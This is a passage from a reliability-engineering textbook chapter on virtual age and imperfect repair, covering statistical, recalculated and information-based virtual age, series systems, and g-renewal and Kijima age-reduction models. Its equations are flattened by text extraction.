time-dependent scale-transformation function W (t ) . As this function is differentiable, it can be interpreted as an additive cumulative degradation function: t W (t ) = w(u )du , (5.3) 0 where w(t ) has the same meaning as that of a degradation rate. Without losing generality, we assume for convenience that the degradation rate in the baseline environment is equal to 1 . In fact, by doing this we define W (t ) and w(t ) as the relative cumulative degradation and the relative rate of degradation, respectively. Definition 5.1. Let t be the calendar age of a degrading item operating in a baseline environment. Assume that ALM (5.2) describes the lifetime of another statistically identical item, which operates in a more severe environment for the same duration t . Then the function W (t ) defines the statistical virtual age of the second item, or, equivalently, the inverse function W −1 (t ) defines the statistical virtual age of the first item when a more severe environment is set as the baseline environment. This definition means that an item that was operating in a more severe environment for the time t ‘acquires’ the statistical virtual age W (t ) > t . On the other hand, if we define a more severe regime as the baseline regime, the corresponding acquired statistical virtual age in a lighter regime would be W −1 (t ) < t . This can easily be seen after substituting into Equation (5.2) the inverse function W −1 (t ) instead of t . Definition 5.1 is, in fact, about the age correspondence of statistically identical items operating in different environments. When the failure rates or the corresponding Cdfs are given (or estimated from data), the ALM defined by (5.2) can be viewed as an equation for obtaining W (t ) , i.e., ⎫⎪ ⎧⎪ W (t ) ⎧⎪ t ⎫⎪ exp⎨− λs (u )du ⎬ = exp⎨− λb (u )du ⎬ ⎪⎩ 0 ⎪⎭ ⎪⎭ ⎪⎩ 0 ∫ t ⇒ λs (u )du = 0 W (t ) ∫ λ (u)du . b 0 (5.4) Virtual Age and Imperfect Repair 97 Hence, the statistical virtual age W (t ) is uniquely defined by Equation (5.4). Similar to (5.4), the ‘symmetrical’ statistical virtual age W −1 (t ) is obtained from the following equation: W −1 ( t ) t ∫ λ (u)du = ∫ λ (u)du . b 0 s 0 Remark 5.3 Equation (5.4) can be interpreted in terms of the cumulative exposure model (Nelson, 1990), i.e., the virtual age W (t ) ‘produces’ the same population cumulative fraction of units failing in a more severe environment as the age t does in the baseline environment (see also the next section). This age (time) correspondence concept was widely used in the literature on accelerated life testing. However, it does not necessarily lead to our degradation-based virtual age, but just defines the time (age) correspondence in different regimes based on equal probabilities of failure. The problem of age correspondence for different populations is very important in demographic applications, especially for modelling possible changes in the retirement age. Populations in developed countries are ageing, which means that the proportion of old people is increasing. Therefore, the increase in the retirement age from 65 to 65+ has already been considered as an option in some of the European countries. Equation (5.4) can be used for the corresponding modelling of two populations: one with the ‘old’ mortality rate λs (t ) and the other the contemporary mortality rate λb (t ) . As λb (t ) < λs (t ), t > 0 , the value W (65) > 65 obtained from Equation (5.4) defines the new retirement age. Other approaches to the age correspondence problem in demography are considered, for example, in Denton and Spencer (1999). Example 5.1 Let the failure rates in both regimes be increasing, positive power functions (the Weibull distributions), which are often used for lifetime modelling of degrading objects, i.e., β λb (t ) = α t , λs (t ) = μ tη , α , β , μ ,η > 0 . The statistical virtual age W (t ) is defined by Equation (5.4) as 1 η +1 ⎛ μ ( β + 1) ⎞ β +1 β +1 ⎟⎟ t . W (t ) = ⎜⎜ ⎝ α (η + 1) ⎠ In order for the inequality W (t ) > t to hold, the following restrictions on the parameters are sufficient: η ≥ β , μ ( β + 1) > α (η + 1) . As follows from Equation (5.2), the failure rate that corresponds to the Cdf Fs (t ) is λs (t ) = dFb (W (t )) = w(t )λb (W (t )) . dtFb (W (t )) (5.5) 98 Failure Rate Modelling for Reliability and Risk If, for example, the failure rate in a baseline regime is constant, then λs (t ) is proportional to the rate of degradation w(t ) . Remark 5.4 The assumption of degradation is important for our model. The statistical virtual age is defined in (5.4) by equating the same amount of degradation in different environments. We implicitly assume that the accumulated failure rate is a measure of this degradation, which often (but not always) can be considered as a reasonably appropriate model. 5.2.2 Recalculated Virtual Age The previous section was devoted to age correspondence in different environments. It is more convenient now to use the term regime instead of environment. What happens when the baseline regime is switched to a more severe one? The answer to this question is considered in this section. Let an item start operating in a baseline regime at t = 0 , which is switched at t = x to a more severe regime. In accordance with Definition 5.1, the statistical virtual age immediately after the switching is Vx = W −1 ( x) , where the new notation Vx is used for convenience. Assume now that the governing Cdf after the switching is Fs (t ) and that the Cdf of the remaining lifetime is Fs (t | Vx ) , i.e., Fs (t | Vx ) = 1 − Fs (t + Vx ) , Fs (Vx ) (5.6) as defined by Equation (2.7). Thus, an item starts operating in the second regime with a starting age Vx defined with respect to the Cdf Fs (t ) . Note that the form of the lifetime Cdf after the switching given by Equation (5.6) is our assumption and that it does not follow directly from ALM (5.2). In general, the starting age could differ from Vx , or (and) the governing distribution could differ from Fs (t ) . Alternatively, we can proceed starting with ALM (5.2) and obtain the Cdf of an item’s lifetime for the whole interval [0, ∞) , and this will be performed in what follows. According to our interpretation of the previous section, the rate of degradation is 1 in t ∈ [0, x) . Assume that the switching at t = x results in the rate w(t ) > 1 in [ x, ∞) , where w(t ) is defined by ALM (5.2) and (5.3). Note that this is an important assumption on the nature of the impact of regime switching in the context of the ALM. Remark 5.5 An alternative option, which is not discussed here, is the jump from the curve λb (t ) to the curve λs (t ) at t = x . This option can be interpreted in terms of the proportional hazards model, which is usually not suitable for lifetime modelling of degrading objects (Bagdonavicius and Nikulin, 2002). Under the stated assumptions, the item’s lifetime Cdf in [0, ∞) , to be denoted by Fbs (t ) , can be written as (Finkelstein, 1999) Virtual Age and Imperfect Repair 0 ≤ t < x, ⎧ Fb (t ), ⎪ t ⎞ Fbs (t ) = ⎨ ⎛ ⎜ ⎟ ⎪ Fb ⎜ x + w(u ))du ⎟, x ≤ t < ∞. x ⎠ ⎩ ⎝ 99 (5.7) Transformation of the second row on the right-hand side of this equation results in t ⎛ t ⎞ ⎛ ⎞ Fb ⎜ x + w(u )du ⎟ = Fb ⎜ w(u ))du ⎟ ⎜ ⎟ ⎜ ⎟ x ⎝ ⎠ ⎝ τ ( x) ⎠ (5.8) = Fb (W (t ) − W (τ ( x )) ) , where τ ( x) < x is uniquely defined from the equation x x= ∫ w(u)du = W ( x) − W (τ ( x)) . (5.9) τ ( x) It follows from Equation (5.9) that the cumulative degradation in [τ ( x), x) in the second regime is equal to the cumulative degradation in the baseline regime in [0, x) , which is x . Therefore, the ~ age of an item just after switching to a more severe regime can be defined as Vx = x − τ ( x) . Let us call it the recalculated virtual age. Definition 5.2. Let a degrading item start operating at t = 0 in the baseline regime and be switched to a more severe regime at t = x . Assume that the corresponding Cdf in [0, ∞) is given by Equation (5.7),~which follows from ALM (5.2) and (5.3). Then the recalculated virtual age Vx after switching at t = x is defined as x − τ (x) , where τ (x) is the unique solution to Equation (5.9). ~ Remark 5.6 It can be shown that Vx uniquely defines the state of an item in~ the described model only for linear W (t ) . For a general case, the vector (Vx ,τ ( x)) should be considered. We are now interested ~ in comparing the statistical virtual age Vx with the recalculated virtual age Vx and will show that under certain assumptions these quantities are equal. Equation (5.9) has the following solution: τ ( x) = W −1 (W ( x) − x) . ~ As Vx = W −1 ( x) , the equation Vx = Vx can be written in the form of the following functional equation: x − W −1 ( x) = W −1 (W ( x) − x ) . Applying operation W (⋅) to both parts of this equation gives 100 Failure Rate Modelling for Reliability and Risk W ( x − W −1 ( x)) = W ( x) − x . It is easy to show (see also Example 5.2) that the linear function W (t ) = wt is a solution to this equation. It is also clear that it is the unique solution, as the functional equation f ( x + y ) = f ( x) + f ( y ) has only a linear solution. Therefore, the recalculated virtual age in this case is equal to the statistical virtual age. The following example shows that the function defined by the second row in the righthand side of Equation (5.7) is a segment of the Cdf Fs (t ) for t ≥ x only for this specific linear case. Example 5.2 In accordance with Equations (5.2) and (5.8), Fb ( w ⋅ (t − τ ( x))) = Fs (t − τ ( x)) , where τ (x) is obtained from a simplified version of Equation (5.8), i.e., x x= ∫ wdu ⇒ τ ( x) = τ ( x) and x( w − 1) w ~ Vx = x − τ ( x) = x / w , V x = W −1 ( x ) = x / w . Note that the virtual age in this case does not depend on the distribution functions. It also follows from this example that the Cdf Fbs (t ) for the linear W (t ) can be defined in the way most commonly found in the literature on accelerated life testing (e.g., Nelson, 1990; Meeker and Escobar, 1998), i.e., ⎧ Fb (t ), Fbs (t ) = ⎨ ⎩ Fs (t − τ ( x)), 0 ≤ t < x, x ≤ t < ∞. This Cdf can be equivalently written as ⎧⎪ Fb (t ), Fbs (t ) = ⎨ ~ ⎪⎩ Fs (t − x + Vx ), 0 ≤ t < x, x ≤ t < ∞. The Cdf of the remaining time at t = x , in accordance with this equation, is ~ Fs (t − x + Vx ) − Fb (t ) = Fs (t ′ | Vx ) , Fb (t ) Virtual Age and Imperfect Repair 101 ~ where the notation t − x ≡ t ′ ≥ 0 and equations Fb ( x) = Fs (Vx ) , Vx = Vx were used. Therefore, the remaining lifetimes obtained via the rate-of-degradation concept and via Equation (5.6) are equal for the linear scale function W (t ) = wt . Moreover, the Cdf after switching is just the shifted Fs (t ) in this particular case. The failure rate that corresponds to the Cdf Fbs (t ) is 0 ≤ t < x, ⎧λ (t ), λbs ( x) = ⎨ b ⎩λs (t − τ ( x)) = λs (t − x + Vx ), x ≤ t < ∞. This form of the failure rate often defines the ‘Sedjakin Principle’ (Bagdonavicius and Nikulin, 2002; Finkelstein, 1999a). In his original seminal work, Sedjakin (1966) defines the notion of a resource in the form of a cumulative failure rate. He assumes that after switching, the operation of the item depends on the history only via this resource and does not depend on how it was accumulated. This assumption, in fact, leads to Equation (5.4), which describes the equality of resources for different regimes, and eventually to the definition of the virtual age in our sense of the term. This paper played an important role in the development of accelerated life testing as a field. For example, the cumulative exposure model of Nelson (1990) is a reformulation of the Sedjakin Principle. −1 When W (t ) is a non-linear function, the ~ statistical virtual age Vx = W ( x) is not equal to the recalculated virtual age Vx = x − τ ( x) , and the second row in the right-hand side of Equation (5.7) cannot be transformed into a segment of the Cdf Fs (t ) . Therefore, the appealing virtual age interpretation of the age recalculation model with a governing Cdf Fs (t ) no longer exists in the described simple form. Note that we can still formally define a different Cdf after switching and the corresponding virtual age as a starting age for this distribution, but this approach needs more clarification and additional assumptions (Finkelstein, 1997). The considered virtual age concept makes sense only for degrading items. Assume now that an item is not degrading and is described by exponential distributions in both regimes, i.e., Fb (t ) = exp{−λb t}, Fs (t ) = exp{−λs t}, λb < λs . Equation (5.1) holds for this setting, and therefore, taking into account (5.4), the scale transformation is also ~ linear, i.e., W (t ) = wt , where w = λs / λb . We can formally define Vx and Vx , but these quantities now have nothing to do with the virtual age concept, as they describe only the correspondence between the times of exposure in the two regimes (Nelson, 1990). Therefore, the increasing with time cumulative failure rate is not a good choice for ‘resource function’ in this case. A possible alternative approach dealing with this problem is based on considering the decreasing MRL function as a measure of degradation. The corresponding recalculated virtual age can also be defined for this setting (Finkelstein, 2007a). Remark 5.7 The virtual age concept of this section can also be applied to repairable systems. Keeping the notation but not the literal meaning, assume that initially the lifetime of a repairable item is characterized by the Cdf Fb (t ) and the imperfect repair changes it to Fs (t | Vx ) , where Vx is the virtual age just after repair at t = x . 102 Failure Rate Modelling for Reliability and Risk The special case Fs (t ) = Fb (t ) will be the basis for age reduction models of imperfect repair to be considered later in this chapter. Thus, we have two factors that define a distribution after repair. First, the imperfect repair changes the Cdf from Fb (t ) to Fs (t ) , and it is reasonable to assume that the corresponding lifetimes are ordered as in (5.1). As an option, parameters of the Cdf Fb (t ) can be changed by the repair action. If, e.g., Fb (t ) = 1 − exp{−λt α }; λ , α > 0 is a Weibull distribution, then a smaller value of parameter λ will result in (5.1). Secondly, the model includes the virtual age Vx as the starting (initial) age for an item described by the Cdf Fs (t ) , which was called in Finkelstein (1997) “the hidden age of the Cdf after the change of parameters”. This model describes the dependence between lifetimes before and after repair that usually exists for degrading repairable objects. If Vx = 0 , the lifetimes are independent, but the model still can describe an imperfect repair action, as Ordering (5.1) holds. Specifically, the consecutive cycles of the geometric process of Section 4.3.3 present a relevant example. 5.2.3 Information-based Virtual Age An item in the previous section was considered as a ‘black box’ and no additional information was available. However, deterioration is a stochastic process, and therefore individual items age differently. Observation of the state of an item at a calendar time t can give an indication of its virtual age defined by the level of deterioration. This reasoning is somehow similar to the approach used in Chapter 2 for describing the information-based MRL (Example 2.1) and in Chapter 4 for the information-based minimal repair (Section 4.4.2). Note that we discuss this topic here mostly on a heuristic level that can be made mathematically strict using an advanced theory of stochastic processes (Aven and Jensen, 1999). We start with a meaningful reliability example that will help us to understand the notion of the information-based virtual age. The number of operating components in a system k at the time of observation t defines the corresponding level of deterioration in this example. We want to compare k with the expected number of operating components D(t ) . Therefore, D (t ) is just a scale transformation of the calendar age t , whereas k is defined as the same scale transformation of the corresponding information-based virtual age. Example 5.3 Consider a system of n + 1 i.i.d. components (one operating at t = 0 and n standby components) with constant failure rates λ . Denote the system’s lifetime random variable by Tn +1 . The system lifetime Cdf is defined by the Erlangian distribution as n (λ t ) i Fn+1 (t ) ≡ Pr[Tn+1 ≤ t ] = 1 − exp{−λt}∑ i! 0 with the increasing failure rate λn+1 (t ) = λ exp{λt}(λt ) n n! . n (λ t ) i exp{−λt}∑ 0 i! Virtual Age and Imperfect Repair 103 For this system, the number of failed components observed at time t is a natural measure of accumulated degradation in [0, t ] . In order to define the corresponding information-based virtual age to be compared with the calendar age t , consider, firstly, the following conditional expectation: n exp{−λt} D(t ) ≡ E[ N (t ) | N (t ) ≤ n] = 0 n i exp{−λt} 0 (λ t ) i i! , (λ t ) i i! (5.10) where N (t ) is the number of events in [0, t ] for the Poisson process with rate λ . The function D (t ) is monotonically increasing, D(0) = 0 and limt → ∞ D(t ) = n . The unconditional expectation E[ N (t )] = λ t is a linear function and exhibits a shape that is different from D(t ) . The function D(t ) defines an average degradation curve for the system under consideration. If our observation 0 ≤ k ≤ n , i.e., the number of failed components at time t ‘lies’ on this curve, then the information-based virtual age is equal to the calendar age t . Denote the information-based virtual age by V (t ) and define it (for the considered specific model) as the following inverse function: V (t ) = D −1 (k ) . (5.11) If k = D(t ) , then V (t ) = D −1 ( D(t )) = t . Similarly, k < D(t ) ⇒ V (t ) < t , k > D(t ) ⇒ V (t ) > t , which is illustrated by Figure 5.1. The approach to defining the virtual age considered in Example 5.3 can be generalized to a monotone, smoothly varying stochastic process of degradation (wear). We also assume for simplicity that this is a process with independent increments, and therefore it possesses the Markov property. Definition 5.3. Let Dt , t ≥ 0 be a monotone, predictable, smoothly varying stochastic process of degradation with independent increments and a strictly monotone mean D (t ) , and let d t be its realization (observation) at calendar time t . Then the information-based virtual age at t is defined by the following function: V (t ) = D −1 (d t ) . (5.12) Note that, in accordance with the corresponding definition (Aven and Jensen, 1999), the failure time of the system in Example 5.3 is a stopping time for the degradation process, as observation of this process indicates whether a failure had occurred or not. Definition 5.3 refers to the case of a stochastic process without a stopping time. However, if this is the case and the failure time T is a stopping time, this definition should be modified by using E[ Dt | T > t ] instead of D(t ) . 104 Failure Rate Modelling for Reliability and Risk n k D(t) t V (t) D-1(k) Figure 5.1. Degradation curve for the system with standby components Remark 5.8 V (t ) is a realization of the corresponding information-based virtual age process Vt , t ≥ 0 that can be defined as Vt = D −1 ( Dt ) . The process Vt − t shows the deviation of the information-based virtual age from the calendar age t . An alternative way of defining the information-based virtual age V (t ) is via the information-based remaining lifetime (Example 2.1). The conventional mean remaining lifetime (MRL) m(t ) of an item with the Cdf F (x ) is defined by Equation (2.7). We will compare m(t ) with the information-based MRL denoted by mI (t ) . In this case, the observed level of degradation dt is considered a new initial value for a corresponding degradation process. Therefore, mI (t ) defines the mean time to failure for this setting. If d t = k is the number of failed components, as in Example 5.3, then mI (t ) = (n + 1 − k ) / λ . Definition 5.4. The information-based virtual age of a degrading system is given by the following equation: V (t ) = t + (m(t ) − mI (t )) . (5.13) Thus, the information-based virtual age in this case is the chronological age plus the difference between the conventional and the information-based MRLs. It is clear that V (t ) can be positive or negative. If, e.g., m(t ) = t1 < t 2 = mI (t ) , then V (t ) = t − (t 2 − t1 ) < t and we have an additional t2 − t1 expected years of life of our system, as compared with the ‘no information’ version. It follows from Equa- Virtual Age and Imperfect Repair 105 tion (2.9) that dm(t ) / dt > −1 , and therefore, under some reasonable assumptions, mI (t ) − m(t ) < t (Finkelstein, 2007). This ensures that V (t ) is positive. Note that the meaning of Definition 5.4 is in adding (subtracting) to the chronological age t the gain (loss) in the remaining lifetime owing to additional information on the state of a degradation process at time t . The next example illustrates this definition. Example 5.4 Consider a system of two i.i.d. components in parallel with exponential Cdfs. Then F (t ) = exp{−2λt} − 2 exp{−λt} and 1 λ < m(t ) = ∫ 0 2 exp{−λt} − exp{−2λt} exp{−λx} 1.5 . dx < λ 2 − exp{−λx} If we observe at time t two operating components, then mI (t ) > m(t ) , and the information-based virtual age in this case is smaller than the calendar age t . If we observe only one operating component, then V (t ) > t . We have discussed several different definitions of virtual age. The approach to be used usually depends on information at hand and the assumptions of the model. If there is no additional information and our main goal is to consider age correspondence for different regimes, then the choice is W (t ) of Definition 5.1. When there is a switching of regimes for degrading items, then a possible option is the recalculated virtual age of Definition 5.2. If the degradation curve can be modelled by an observed, monotone stochastic process and the criterion of failure is not well defined, then the first choice is Definition 5.3. Finally, if the failure time distribution of an item is based on a stochastic process with different initial values, and therefore the corresponding mean remaining lifetime can be obtained, then the information-based Definition 5.4 is preferable. These are just general recommendations. The actual choice depends on the specific settings. 5.2.4 Virtual Age in a Series System In this section, possible approaches to defining the virtual age of a series system with different virtual ages of components will be briefly considered. In a conventional setting, all components have the same calendar age t , and therefore a similar problem does not exist, as the calendar age of a system is also t . When components of a system can be characterized by virtual ages, it is really challenging in different applications (especially biological) to define the corresponding virtual age of a series system. For example, assume that there are two components in series. If the first one has a much higher relative level of degradation than the second component, the corresponding virtual ages are also different. Therefore, the virtual age of this system should be defined in some way. As usual, when we want to aggregate several measures into one overall measure, some kind of weighting of individual quantities should be used. We start by considering the statistical virtual age discussed in Section 5.2.1. The survival functions of a series system of n statistically independent components in the baseline environment and in a more severe environment are 106 Failure Rate Modelling for Reliability and Risk Fb (t ) = n Fbi (t ) , Fs (t ) = 1 n ∏F bi (Wi (t )) , 1 respectively, where Wi (t ) is a scale transformation function for the i th component. We assume that Model (5.2) holds for every component. Thus, each component has its own statistical virtual age Wi (t ) , whereas the virtual age for the system W (t ) is obtained from the following equation: Fb (W (t )) = n ∏F bi (Wi (t )) 1 or, equivalently, using Equation (5.4), W (t ) n ∫ ∑λ bi 0 1 (u )du = n Wi ( t ) ∑ ∫λ bi 1 (u )du . (5.14) 0 Example 5.5 Let n = 2 . Assume for simplicity that W1 (t ) = t (which means, e.g., that the first component is protected from the environment) and that the virtual age of the second component is W2 (t ) = 2t . Therefore, the second component has a higher level of degradation. Equation (5.14) turns into W (t ) ∫ 0 t 2t (λb1 (u ) + λb 2 (u ))du = λbi (u )du + λb 2 (u )u . 0 0 Let the failure rates be linear, i.e., λb1 (t ) = λ1t , λb 2 (t ) = λ2t , λ1 , λ2 > 0 . Integrating and solving the simple algebraic equation gives ⎛ λ + 4λ2 W (t ) = ⎜ 1 ⎜ λ +λ 1 2 ⎝ ⎞ ⎟t . ⎟ ⎠ If the components are statistically identical in the baseline environment ( λ1 = λ2 ), then W (t ) = 5 / 2 t ≈ 1.6t , which means that the statistical virtual age of a system with chronological age t is approximately 1.6t . The ‘weight’ of each component is eventually defined by the relationship between λ1 and λ2 . When, e.g., λ1 / λ2 tends to 0 , the statistical virtual age of a system tends to 2t , i.e., the statistical virtual age of the second component. In order to define the information-based virtual age of a series system, we will weight the virtual ages of n degrading components in accordance with the reliability importance (Barlow and Proschan, 1975) of the components with respect to the failure of the system. Let Vi (t ), i = 1,2,..., n denote the information-based virtual age of the i th component with the failure rate λi (t ) in a series system of n statis- Virtual Age and Imperfect Repair 107 tically independent components. The virtual age of a system at time t can be defined as the expected value of the virtual age of the failed in [t , t + dt ) component, i.e., n λ (t ) V (t ) = ∑ i Vi (t ) , (5.15) λ 1 s (t ) n where λs (t ) = ∑ λi (t ) is the failure rate of the series system. 1 Similar to the previous section, the second approach is also based on the notion of the MRL function (Finkelstein, 2007). 5.3 Age Reduction Models for Repairable Systems Our discussion of the virtual age concept in Section 5.2 was mostly based on the age recalculation technique for non-repairable items with a single regime change point. Remark 5.7 already presented some initial reasoning concerning the application of the virtual age concept to repairable objects. We now start with a description of several imperfect repair models, where each repair decreases the age of the operating item to a value always to be called the virtual age. When a repair is perfect, the virtual age is 0 ; when it is minimal, the virtual age is equal to the calendar age. Our interest is in intermediate cases. We study properties of the corresponding renewal-type processes and other relevant characteristics. 5.3.1 G-renewal Process This model was probably the first mathematically justified virtual age model of imperfect repair, although the authors (Kijima and Sumita, 1986) considered it as a useful generalization of the renewal process not linking it directly with a process of imperfect repair. However, this link definitely exists and can be seen from the following example. Example 5.6 Suppose that a component with an absolutely continuous Cdf F (t ) is supplied with an infinite number of ‘warm standby’ components with Cdfs F (qt ) , where 0 < q ≤ 1 is a constant. This system starts operating at t = 0 . The first component operates in a baseline regime, whereas the standby components operate in a less severe regime. Upon each failure in the baseline regime, the component is instantaneously replaced by a standby one, which is switched into operation in the baseline regime. Therefore, the calendar age of the standby component should be recalculated. This is exactly the setting considered in Example 5.2 with an obvious change of w to 1 / q , as the baseline regime is now more severe. Thus, the virtual age (which was called the recalculated virtual age in Section 5.2.2) Vx of a standby component that had replaced the operating one at t = x is qx . The corresponding remaining lifetime Cdf, in accordance with Equation (2.7), is F (t | Vx ) = F (t | qx) = F (t + qx) − F (qx) . F (qx) (5.16) 108 Failure Rate Modelling for Reliability and Risk Note that Equation (5.16) is obtained using the age recalculation approach of Section 5.2.1, which is based on the specific linear case of Equation (5.2). When q = 1 , (5.16) defines minimal repair; when q = 0 , the components are in cold standby (perfect repair). The age recalculation in this model is performed upon each failure. The corresponding sequence of interarrival times { X i }i≥1 forms a generalized renewal process. Recall that the cycles of the ordinary renewal process are i.i.d. random variables. In the g-renewal process, the duration of the (n + 1) th cycle, which starts at t = sn ≡ x1 + x2 + ... + xn , n = 0,1,2..., s0 = 0 , is defined by the following conditional distribution: Pr[ X n+1 ≤ t ] = F (t | qsn ) , where, as usual, sn is a realization of the arrival time S n . An obvious and practically important interpretation of the model considered in Example 5.6 is when the standby components are interpreted as the spares for the initial component. The imperfect repair in this case is just an imperfect overhaul, as the spare parts are also ageing. Statistical estimation of q in this specific model was studied by Kaminskij and Krivtsov (1998, 2006). We will now generalize Example 5.6 to the case of non-linear ALM (5.2). Let a failure, not necessarily the first one, occur at t = x . It is instantaneously imperfectly repaired. In accordance with Equation (5.6), the virtual age after the repair is Vx = W −1 ( x ) ≡ q ( x) , where q(x) is a continuous increasing function, 0 ≤ q( x) ≤ x . As in Equation (5.16), the Cdf of the time to the next failure is F (t | Vx ) . The most important feature of the model is that F (t | Vx ) depends only on the time x and not on the other elements of the history of the corresponding point process. This property makes it possible to generalize Equations (4.10) and (4.11) to the case under consideration. The point process of imperfect repairs N (t ), t ≥ 0 , as in the case of an ordinary renewal process, is characterized by the corresponding renewal function H (t ) = E[ N (t )] and the renewal density function h(t ) = H ′(t ) . The following generalizations of the ordinary renewal equations (4.10) and (4.11) can be derived: t H (t ) = F (t ) + h( x) F (t − x | q( x))dx , (5.17) 0 t h(t ) = f (t ) + h( x) f (t − x | q ( x))dx , (5.18) 0 where f (t − x | q( x)) is the density that corresponds to the Cdf F (t − x | q( x)) . The strict proof of these equations and the sufficient conditions for the corresponding unique solutions can be found in Kijima and Sumita (1986). This paper is written as an extension of the traditional renewal theory. On the other hand, Equation (5.18) has an appealing probabilistic interpretation, which can be considered a heuristic proof: as usual, h(t )dt defines the probability of repair in [t , t + dt ) . Using the law of total probability, we split this probability into the probability f (t )dt that the first repair had occurred in [t , t + dt ) and the probability h( x)dx that the last before t repair had occurred in [ x, x = dx ) multiplied by the probability Virtual Age and Imperfect Repair 109 f (t − x | q( x ))dt that the last repair had occurred in [t , t + dt ) . Obviously, this product should be integrated from 0 to t . This brings us to Equation (5.18). Note that the ordinary renewal equation (4.11) also has the same interpretation. This can be seen after the corresponding change of the variable of integration, i.e., t ∫ 0 t h(t − x) f ( x)dx = h( x) f (t − x)dx . (5.19) 0 Example 5.7 Let q ( x ) = 0 . Then f (t − x | q( x)) = f (t − x) . Taking into account (5.19), it is easy to see that Equation (5.18) becomes Equation (4.11). The same is true for Equation (5.18), which can be seen after changing the variable of integration on the right-hand side of Equation (4.10) and integrating by parts, i.e., t ∫ 0 t H (t − x) f ( x)dx = h( x) F (t − x)dx . (5.20) 0 Example 5.8 Let q( x) = x (the minimal repair). Equations (5.17) and (5.18) can be explicitly solved in this case. However, we will only show that the rate of the nonhomogeneous Poisson process λr (t ) , which is equal to the failure rate λ (t ) of the governing Cdf F (t ) (Section 4.3.1), is a solution to Equation (5.18). Taking into account that h(t ) = λ (t ) and that f (t − x | x)) = f (t ) / F ( x) , (1 / F ( x))′ = λ ( x) / F ( x) , the right-hand side of Equation (5.18) is equal to λ (t ) , i.e., t t 0 0 f (t ) + ∫ h( x) f (t − x | q ( x))dx = f (t ) + f (t ) ∫ λ ( x) F ( x) dx = λ (t ) , as the process of minimal repairs is the NHPP. A crucial feature of the g-renewal model is a specific simple dependence of the virtual age Vx after the repair on the chronological time t = x only of this repair. This allows us to derive the renewal equations in the form given by Equations (5.17) and (5.18). Although these equations cannot be solved explicitly in terms of Laplace transforms, they are integral equations of the Volterra type and can be solved numerically. In what follows we will consider models with a more complex dependence on the past. 5.3.2 ‘Sliding’ Along the Failure Rate Curve The g-renewal process of the previous section possesses another important feature. Each cycle of this renewal-type process is defined by the same governing Cdf 110 Failure Rate Modelling for Reliability and Risk F (t ) with the failure rate λ (t ) and only the starting age for this distribution is given by the virtual age Vx = q(x) . Therefore, the cycle duration after the repair at t = x is described by the Cdf F (t | Vx ) . The formal definition of the g-renewal process can now be given via the corresponding intensity process. Definition 5.5. The g-renewal process is defined by the following intensity process: λt = λ (t − S N (t ) + q( S N (t ) )) , (5.21) where, as usual, S N (t ) denotes the random time of the last renewal. In the imperfect repair setting, q(x) is usually a continuous, increasing function and 0 ≤ q( x) ≤ x . When q ( x) = 0 , Equation (5.21) reduces to renewal intensity process (4.15), and when q( x) = x , we arrive at the rate of the NHPP. In the spare parts example, the function Vx is linearly increasing in x . Thus, as in the case of an ordinary renewal process, the intensity process is defined by the same failure rate λ (t ) , only the cycles now start with the initial failure rate λ (q( S n (t ) ), n(t ) = 1,2,... . One of the important restrictions of this model is the assumption of the ‘fixed’ shape of the failure rate. However, this assumption is well motivated, e.g., for the spare-parts setting. Another strong assumption states that the future performance of an item repaired at t = x depends on the history of a point process only via x . Therefore, we will keep the ‘sliding along the λ (t ) curve’ reasoning and will generalize it to a more complex case than the g-renewal case dependence on a history of the point process of repairs. Assume that each imperfect repair reduces the virtual age of an item in accordance with some recalculation rule to be defined for specific models. As the shape of the failure rate is fixed, the virtual age at the start of a cycle is uniquely defined by the ‘position’ of the corresponding point on the failure rate curve after the repair. Therefore, Equation (5.21) for the intensity process can be generalized to λt = λ (t − S N (t ) + VS N ( t ) ) , (5.22) where VS N (t ) is the virtual age of an item immediately after the last repair before t . From now on, for convenience, the capital letter V will denote a random virtual age, whereas v will denote its realization. Equation (5.22) gives a general definition for the models with a fixed failure rate shape. It should be specified by the corresponding virtual age, e.g., as in Equation (5.21). In a rather general model considered by Uematsu and Nishida (1987), the virtual age in (5.22) was defined as an arbitrary positive and continuous function of all previous cycle durations and of the corresponding repair factors. These authors assumed that the function q(x) is linear, i.e., q( x) = qx and that the repair factor q is different for different cycles. It is clear that one cannot derive useful properties from a general setting like this. The relevant special cases will be considered later in this section. It follows from Equation (5.22) that the intensity process between consecutive repairs can be ‘graphically’ described as horizontally parallel to the initial failure rate λ (t ) as all corresponding shifts are in the argument of the function λ (t ) (Doyen and Gaudoin, 2004, 2006). Virtual Age and Imperfect Repair 111 Before considering specific models, we define a simple but important notion of a virtual age process, which will be used for discussing the ageing properties of the renewal-type processes. Definition 5.6. Let the intensity process of the imperfect repair model be given by Equation (5.22). Then the corresponding virtual age process is defined by the following equation: At = t − S N ( t ) + VS N ( t ) . (5.23) It follows immediately from this definition and Equations (4.5) and (4.15) that the virtual age processes for the minimal repair and the ordinary renewal processes are At = t , At = t − S N (t ) , (5.24) (5.25) respectively. Thus, as the shape of the failure rate is fixed, At is just a random argument for intensity process (5.22), i.e., λt = λ ( At ) . Obviously, this process reduces to the virtual age VS N (t ) at the moments of repair t = S N (t ) . We now start describing some important specific models for VS N (t ) . The following model (and its generalizations) is the main topic of the rest of this chapter. Let an item start operating at t = 0 . Therefore, the first cycle duration is described by the Cdf F (t ) with the corresponding failure rate λ (t ) . Let the first failure (and the instantaneous imperfect repair) occur at X 1 = x1 . Assume that the imperfect repair decreases the age of an item to q( x1 ) , where q(x) is an increasing continuous function and 0 ≤ q( x) ≤ x . Values exceeding x can also be considered, but for definiteness we deal with a model that decreases the age of a failed item. Thus the second cycle of the point process starts with the virtual age v1 = q ( x1 ) and the cycle duration X 2 is distributed as F (t | v1 ) with the failure rate λ (t + v1 ), t ≥ 0 . Therefore, the virtual age of an item just before the second repair is v1 + x2 and it is q(v1 + x2 ) just after the second repair, where we assume for simplicity that the function q(x) is the same at each cycle. The sequence of virtual ages after the i th repair {vi }i≥0 at the start of the (i + 1) th cycle in this model is defined for realizations xi as v0 = 0, v1 = q( x1 ), v2 = q(v1 + x2 ),...., vi = q (vi −1 + xi ) , (5.26) or, equivalently, Vn = q(Vn−1 + X n ), n ≥ 1 , where the distributions of the corresponding interarrival times X i are given by Fi (t ) ≡ F (t | vi −1 ) = F (vi −1 + t ) − F (vi −1 ) , i ≥ 1. F (vi −1 ) (5.27) 112 Failure Rate Modelling for Reliability and Risk For the specific linear case, q( x) = qx, 0 < q < 1 , this model was considered on a descriptive level in Brown et al. (1983) and Bai and Jun (1986). Following the publication of the paper by Kijima (1989) it usually has been referred to as the Kijima II model, whereas the Kijima I model describes a somewhat simpler version of age reduction when only the duration of the last cycle is reduced by the corresponding imperfect repair (Baxter et al., 